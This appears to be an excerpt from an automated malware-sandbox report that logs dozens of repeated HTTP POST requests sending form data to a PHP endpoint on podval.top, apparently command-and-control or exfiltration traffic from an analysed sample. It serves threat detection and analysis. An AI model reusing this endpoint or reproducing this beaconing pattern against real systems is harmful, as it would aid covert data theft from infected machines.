                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic
HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: podval.top
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1080Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1772Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1744Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: podval.topContent-Length: 1792Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1060 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: podval.top | Content-Length: 1772 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1056 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1748 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: podval.top | Content-Length: 500 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: podval.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: podval.top | Content-Length: 384 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: podval.top | Content-Length: 1080 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: podval.top | Content-Length: 1780 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1736 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1048 | Expect: 100-continue | Connection: Keep-Alive
